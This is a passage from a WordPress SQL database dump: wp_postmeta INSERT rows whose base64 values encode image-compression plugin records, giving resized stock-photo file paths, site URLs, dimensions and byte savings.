c3RvY2tfNDQ4MjQxNTkzLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjo0NzAsInRpbWUiOjE0ODM1ODE0NjUsImlkIjo3OTZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzQ0ODI0MTU5My01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja180NDgyNDE1OTMtNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNDQ4MjQxNTkzLTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjo4ODksInRpbWUiOjE0ODM1ODE0NjgsImlkIjo3OTZ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNDQ4MjQxNTkzLTExNHgxMzAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzQ0ODI0MTU5My0xMTR4MTMwLmpwZyIsIndpZHRoIjoiMTE0IiwiaGVpZ2h0IjoiMTMwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja180NDgyNDE1OTMtMTE0eDEzMC5qcGciLCJyZWR1Y3Rpb24iOjUwNywidGltZSI6MTQ4MzU4MTQ3MiwiaWQiOjc5Nn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja180NDgyNDE1OTMtMTgweDE4MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNDQ4MjQxNTkzLTE4MHgxODAuanBnIiwid2lkdGgiOiIxODAiLCJoZWlnaHQiOiIxODAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzQ0ODI0MTU5My0xODB4MTgwLmpwZyIsInJlZHVjdGlvbiI6NTUwLCJ0aW1lIjoxNDgzNTgxNDc1LCJpZCI6Nzk2fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzQ0ODI0MTU5My0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja180NDgyNDE1OTMtMjQ3eDMwMC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNDQ4MjQxNTkzLTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjo2MzYsInRpbWUiOjE0ODM1ODE0NzksImlkIjo3OTZ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNDQ4MjQxNTkzLTMwMHgzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzQ0ODI0MTU5My0zMDB4MzAwLmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja180NDgyNDE1OTMtMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjczMCwidGltZSI6MTQ4MzU4MTQ4MiwiaWQiOjc5Nn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja180NDgyNDE1OTMtNDAweDQwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNDQ4MjQxNTkzLTQwMHg0MDAuanBnIiwid2lkdGgiOiI0MDAiLCJoZWlnaHQiOiI0MDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzQ0ODI0MTU5My00MDB4NDAwLmpwZyIsInJlZHVjdGlvbiI6ODA4LCJ0aW1lIjoxNDgzNTgxNDg2LCJpZCI6Nzk2fV0='); 
INSERT INTO `wp_postmeta` VALUES (29962, 795, 'wpfc_optimisation_reduction', '10673'); 
INSERT INTO `wp_postmeta` VALUES (29963, 795, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM4OTI1MDQxNS5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zODkyNTA0MTUuanBnIiwid2lkdGgiOjU3MTUsImhlaWdodCI6MzgxNSwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU4MTQ5MSwiaWQiOiI3OTUifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zODkyNTA0MTUtMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzg5MjUwNDE1LTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM4OTI1MDQxNS0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6NTcwLCJ0aW1lIjoxNDgzNTgxNDk1LCJpZCI6Nzk1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zODkyNTA0MTUtODAweDUzNC5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjUzNCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzg5MjUwNDE1LTgwMHg1MzQuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM4OTI1MDQxNS04MDB4NTM0LmpwZyIsInJlZHVjdGlvbiI6ODI1LCJ0aW1lIjoxNDgzNTgxNDk5LCJpZCI6Nzk1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zODkyNTA0MTUtNzY4eDUxMy5qcGciLCJ3aWR0aCI6NzY4LCJoZWlnaHQiOjUxMywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzg5MjUwNDE1LTc2OHg1MTMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM4OTI1MDQxNS03Njh4NTEzLmpwZyIsInJlZHVjdGlvbiI6NzM3LCJ0aW1lIjoxNDgzNTgxNTAzLCJpZCI6Nzk1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zODkyNTA0MTUtMTYwMHgxMDY4LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjgsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM4OTI1MDQxNS0xNjAweDEwNjguanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM4OTI1MDQxNS0xNjAweDEwNjguanBnIiwicmVkdWN0aW9uIjoyNjEyLCJ0aW1lIjoxNDgzNTgxNTA4LCJpZCI6Nzk1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zODkyNTA0MTUtMjUweDI1MC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzg5MjUwNDE1LTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM4OTI1MDQxNS0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6NTUzLCJ0aW1lIjoxNDgzNTgxNTExLCJpZCI6Nzk1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zODkyNTA0MTUtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzg5MjUwNDE1LTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM4OTI1MDQxNS0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6NDgxLCJ0aW1lIjoxNDgzNTgxNTE0LCJpZCI6Nzk1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zODkyNTA0MTUtMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzg5MjUwNDE1LTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM4OTI1MDQxNS0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6NTA5LCJ0aW1lIjoxNDgzNTgxNTE4LCJpZCI6Nzk1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zODkyNTA0MTUtNTEweDYwMC5qcGciLCJ3aWR0aCI6NTEwLCJoZWlnaHQiOjYwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzg5MjUwNDE1LTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM4OTI1MDQxNS01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6NzIwLCJ0aW1lIjoxNDgzNTgxNTIxLCJpZCI6Nzk1fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM4OTI1MDQxNS0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zODkyNTA0MTUtMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzg5MjUwNDE1LTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjo1ODYsInRpbWUiOjE0ODM1ODE1MjUsImlkIjo3OTV9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzg5MjUwNDE1LTE4MHgxODAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM4OTI1MDQxNS0xODB4MTgwLmpwZyIsIndpZHRoIjoiMTgwIiwiaGVpZ2h0IjoiMTgwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zODkyNTA0MTUtMTgweDE4MC5qcGciLCJyZWR1Y3Rpb24iOjY3MywidGltZSI6MTQ4MzU4MTUyOCwiaWQiOjc5NX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zODkyNTA0MTUtMjQ3eDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzg5MjUwNDE1LTI0N3gzMDAuanBnIiwid2lkdGgiOiIyNDciLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM4OTI1MDQxNS0yNDd4MzAwLmpwZyIsInJlZHVjdGlvbiI6NzYzLCJ0aW1lIjoxNDgzNTgxNTMyLCJpZCI6Nzk1fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM4OTI1MDQxNS0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zODkyNTA0MTUtMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzg5MjUwNDE1LTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjo4MDQsInRpbWUiOjE0ODM1ODE1MzUsImlkIjo3OTV9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzg5MjUwNDE1LTQwMHg0MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM4OTI1MDQxNS00MDB4NDAwLmpwZyIsIndpZHRoIjoiNDAwIiwiaGVpZ2h0IjoiNDAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zODkyNTA0MTUtNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjg0MCwidGltZSI6MTQ4MzU4MTUzOSwiaWQiOjc5NX1d'); 
INSERT INTO `wp_postmeta` VALUES (29964, 794, 'wpfc_optimisation_reduction', '9870'); 
INSERT INTO `wp_postmeta` VALUES (29965, 794, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzI4Mzc5NTQ2OS5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yODM3OTU0NjkuanBnIiwid2lkdGgiOjQyODgsImhlaWdodCI6Mjg0OCwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU4MTU0NCwiaWQiOiI3OTQifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yODM3OTU0NjktMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjgzNzk1NDY5LTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzI4Mzc5NTQ2OS0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6NTczLCJ0aW1lIjoxNDgzNTgxNTQ3LCJpZCI6Nzk0fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yODM3OTU0NjktODAweDUzMS5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjUzMSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjgzNzk1NDY5LTgwMHg1MzEuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzI4Mzc5NTQ2OS04MDB4NTMxLmpwZyIsInJlZHVjdGlvbiI6ODE5LCJ0aW1lIjoxNDgzNTgxNTUyLCJpZCI6Nzk0fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yODM3OTU0NjktNzY4eDUxMC5qcGciLCJ3aWR0aCI6NzY4LCJoZWlnaHQiOjUxMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjgzNzk1NDY5LTc2OHg1MTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzI4Mzc5NTQ2OS03Njh4NTEwLmpwZyIsInJlZHVjdGlvbiI6ODI0LCJ0aW1lIjoxNDgzNTgxNTU1LCJpZCI6Nzk0fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yODM3OTU0NjktMTYwMHgxMDYzLmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjMsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzI4Mzc5NTQ2OS0xNjAweDEwNjMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzI4Mzc5NTQ2OS0xNjAweDEwNjMuanBnIiwicmVkdWN0aW9uIjoyNDU4LCJ0aW1lIjoxNDgzNTgxNTYwLCJpZCI6Nzk0fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yODM3OTU0NjktMjUweDI1MC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjgzNzk1NDY5LTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzI4Mzc5NTQ2OS0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6NTQ5LCJ0aW1lIjoxNDgzNTgxNTY